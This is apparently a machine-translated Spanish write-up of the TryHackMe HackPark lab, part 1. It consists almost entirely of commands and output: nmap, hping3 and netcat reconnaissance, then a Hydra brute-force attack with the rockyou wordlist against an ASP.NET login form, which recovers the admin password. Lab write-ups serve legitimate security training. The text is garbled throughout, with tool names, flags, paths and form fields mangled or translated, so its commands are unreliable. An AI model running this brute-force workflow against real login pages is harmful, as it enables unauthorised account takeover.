[Tryhackme] ¡Intenté un ataque de fuerza bruta usando Hydra! Hack Park Escritura Parte 1

$ cat /etc /hosts 127.0.0.1 Localhost 127.0.1.1 Hacklab # Las siguientes líneas son deseables para hosts capaces de IPv6 :: 1 Localhost IP6-Localhost IP6-Loopback ff02 :: 1 IP6-allNodes FF02 :: 2 IP6-AllroUnter

$ nmap -pn -t4 -a hack-park.hkl inició nmap 7.92 (https://nmap.org) al 2023-02-09 23:39 Informe de escaneo NMAP de JST para hack-park.hkl (10.10.225.246) El host está UP (0.27s Latency). No se muestra: 998 Puertos TCP filtrados (sin respuesta) Servicio Estatal Versión 80/TCP Open HTTP Microsoft IIS Httpd 8.5 | http-robots.txt: 6 entradas no permitidas | /Account/*.* /search /search.aspx /error404.aspx | _ /Archive /archive.aspx | http métodos: | _ Métodos potencialmente riesgosos: Trace | _http-Title: Hackpark | Hackpark Amusements | _http-server-header: Microsoft-IIS/8.5 3389/TCP Open SSL/MS-WBT-server? | RDP-NTLM-Info: | Target_name: Hackpark | Netbios_domain_name: hackpark | Netbios_comuter_name: Hackpark | Dns_domain_name: hackpark | DNS_Computer_Name: Hackpark | Product_Version: 6.3.9600 | _ System_time: 2023-02-09T14: 41: 06+00: 00 | SSL-CERT: Asunto: CommonName = HackPark | No es válido antes: 2023-02-08T14: 32: 44 | _not válido después: 2023-08-10T14: 32: 44 | _SSL-DATE: 2023-02-09T14: 41: 10+00: 00; -1s desde el tiempo del escáner. Información del servicio: OS: Windows; CPE: CPE:/O: Microsoft: Detección de servicios de Windows realizada. Informe cualquier resultado incorrecto en https://nmap.org/submit/. NMAP realizado: 1 dirección IP (1 host) escaneada en 119.06 segundos

$ sudo hpping3 -s hack.hkl -p 80 -c 4 127 ⨯ HPing Hack -park.hkl (Tun0 10.10.225.246): s set, 40 encabezados + 0 bytes de datos len = 44 ip = 10.10.225.246 ttl = 127 df id = 3645 deportes = 80 fanders = saq = 0 win = 8192 RTT Len = 44 IP = 10.10.225.246 ttl = 127 df id = 3646 Sport = 80 flags = sa seq = 1 win = 8192 rtt = 265.8 ms len = 44 ip = 10.10.225.246 ttl = 127 df id = 3647 deportes = 80 flags = sa seq = 2 win = 8192 rtt = 273.2 ms ms ms ms IP = 10.10.225.246 TTL = 127 DF ID = 3648 Sport = 80 Flags = SA SEQ = 3 Win = 8192 RTT = 272.5 MS --- Estadísticas de Hack.hkl HPing --- 4 paquetes transmitidos, 4 paquetes recibidos, 0% Pérdida de paquetes Min/AVG/Max = 265.8/272.9/280.2 ms

$ nc hack-park.hkl 80 1 ⨯ cabezal/http/1.0 http/1.1 200 OK CACHE-CONTROL: Contenido privado-longitud: 9429 Tipo de contenido: Text/Html; Charset = UTF-8 Server: Microsoft-IIS/8.5 Content-Style-Type: Text/CSS Content-Script-Type: Text/JavaScript X-Powered-by: Asp.net Fecha: Jue, 09 de febrero 2023 14:51:30 GMT Connection: Close: Close

$ localate rockyou.txt /usr/share/wordlists/rockyou.txt.gz $ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

sudo vi post.data

__ViewState = mkyxgv5%2bc0qigm1t1e0kbtupgtt5mtrclgeqjxx4%2bhgcocu9vmmrki352kls8gbm9eyxtntvxu62xkhhh M5JCY7VVJSNP6M%2BpyXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0V%2B3DDSAG36IWW P4UPF7K%2FTOT2FH2B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBCJJMLEKQHO0XNMF9XN5SQKVESCA7ZWJJ VVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HN5OE%2B6BNCULFWCEEXSKCZ43LVGIIOQINMD3JLIMAWYIK DIN%2F8W3QEAFNTZJVO6EF & __ EventValidation = dpnmf%2b9zemibhs7b1hk6dnt%2fthwjb%2f%2BDA7%2BU9AHP9OAWH Cesdp46tvsxiq6OmghqBC3ynr3a9qi895ru6ytp0d%2blkl6upjxusdgcaywgfbkbpumfrg2p5cgerfo9gvkjfkh%2biHqnss LBY73AOR7XTZO7%2F%2BT8EYJOA8XHFJUFNU9FQRVO & CTL00%24MainContent%24Loginuser%24username = admin & ctl00%24MainContent%24LoginUser%24Password = admin & ctl00%24MainContent%24LoginEnSer

$ Cat Post.data __ViewState = mkyxgv5%2bc0qigm1t1e0kbtupgtt5mtrclgeqjxx4%2bhgcocu9vmmrki352kls8gbm9eyxtntvxu62xkhhh M5JCY7VVJSNP6M%2BpyXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0V%2B3DDSAG36IWW P4UPF7K%2FTOT2FH2B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBCJJMLEKQHO0XNMF9XN5SQKVESCA7ZWJJ vvx3xy%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HN5OE%2B6BNCULFWCEEXSKCZ43LVGIIOQINMD3JLIMAWYIKD en%2f8w3qeafntzjvo6ef & __ eventValidation = dpnmf%2b9zemibhs7b1hk6dnt%2fthwjb%2f%2bda7%2Bu9AHP9OAWHC esdp46tvSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH%2BIHQNSLSL BY73AOR7XTZO7%2F%2BT8EYJOA8XHFJUFNU9FQRVO & CTL00%24MainContent%24LoginUser%24Username =^User^& CTL00 %24MainContent%24LoginUser%24Password =^pase^& ctl00%24MainContent%24LoginUser%24LoginButton = log+in

$ Hydra -L admin -p /usr/share/wordlists/rockyou.txt hackhpark.hkl http-posform "/Account/login.aspx:__Viewstate=MKYXGV5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GB M9EyXTNTVXU62XKHHHM5JCY7VVJSNP6M%2BpyXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0 V%2b3ddsAg36iWP4Upf7K%2ftot2fH2B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBCJJMLEKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HN5OE%2B6BNCULFWCEEXSKCZ43LVGIOQINMD3JLI Mawyikdin%2f8w3qeafntzjvo6ef & __ eventvalidation = dpnmf%2b9zemibhs7b1hk6dnt%2fthwjb%2f%2bdA7%2BU9AHP9OA WHCESDP46TVSXIQ6OMGHQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH%2BIHQNSLB Y73aor7xtzo7%2f%2Bt8EyJoa8xhfjufnu9fqrvo & ctl00%24MainContent%24LoginUser%24Username =^User^& ctl00%24m aincontent%24LoginUser%24Password =^pase^& ctl00%24MainContent%24LoginUser%24LoginButton = log+in: f = inicio de sesión fallido"

$ Hydra -L admin -p /usr/share/wordlists/rockyou.txt hackhpark.hkl http-posform "/Account/login.aspx:__Viewstate=MKYXGV5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GB M9EyXTNTVXU62XKHHHM5JCY7VVJSNP6M%2BpyXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0 V%2b3ddsAg36iWP4Upf7K%2ftot2fH2B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBCJJMLEKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HN5OE%2B6BNCULFWCEEXSKCZ43LVGIOQINMD3JLI Mawyikdin%2f8w3qeafntzjvo6ef & __ eventvalidation = dpnmf%2b9zemibhs7b1hk6dnt%2fthwjb%2f%2bdA7%2BU9AHP9OA WHCESDP46TVSXIQ6OMGHQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH%2BIHQNSLB Y73aor7xtzo7%2f%2Bt8EyJoa8xhfjufnu9fqrvo & ctl00%24MainContent%24LoginUser%24Username =^User^& ctl00%24m aincontent%24LoginUser%24Password =^pase^& ctl00%24MainContent%24LoginUser%24LoginButton = log+in: f = inicio de sesión fallido "Hydra v9.2 (c) 2021 por Van Hauser/THC y David Maciejak - No use en organizaciones militares o de servicio secreto, o para fines ilegales (esto no es vinculante, estos *** ignoran las leyes y la ética de todos modos). Hydra (https://github.com/vanhauser-thc/thc-hydra) a partir de 2023-02-10 00:57:21 [datos] Max 16 tareas por 1 servidor, 16 tareas, 14344399 intentos de inicio de sesión (l: 1/p: 14344399), ~ 896525 en tres pados por tarea [datos] http-posform: //hack-park.hkl: 80/cuenta/login.aspx: __viewState = mkyxgv5%2bc0qigm1t1e0kbtupgtt5mtrclgeqj Xx4%2BHGCOCU9VMMRKI352KLS8GBM9EYXTNTVXU62XKHHM5JCY7VVJSNP6M%2BpyXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QO br2or5dek%2fndmyjwbkgrd0v%2b3ddsAg36iwp4Upf7k%2ftot2fh2b0b0zd8jgkfcx4vb2u%2b9nfoqhyodgupmbx4mn9p%2b%2bbcc jjmlekqHo0xnmf9Xn5Sqkvesca7ZWJVVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0H0HN5OE%2B6BNCULFWCEEXSKCZ4 3lvgiioqinmd3jlimawyikdin%2f8w3qeafntzjvo6ef & __ eventValidation = dpnmf%2b9zemibhs7b1hk6dnt%2fthwjb%2f%2BDA 7%2BU9AHP9OAWHCESDP46TVSXIQ6OMGHQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBPUMFRG2P5CGERFO9GVKJFKH%2 2 2 2 2 Bihqnslby73aor7xtzo7%2f%2bt8eyjoa8xhfjufnu9fqrvo & ctl00%24MainContent%24Loginuser%24Username =^User^y CTL00 %24MainContent%24LoginUser%24Password =^pase^& ctl00%24MainContent%24LoginUser%24LoginButton = log+en: F = Login Falló [estado] 707.00 intentos/min, 707 intentos en 00: 01h, 14343692 para hacer en 338: 09h, 16 activo [80] [http-posto-form] host: hack-park.hkl login: contraseña administradora: 1qaz2wsx 1 de 1 objetivo completado con éxito, 1 contraseña válida hydra (https://github.com/vanhauser-thc/thc-hydra) terminó en 2023-02-10 00:59:22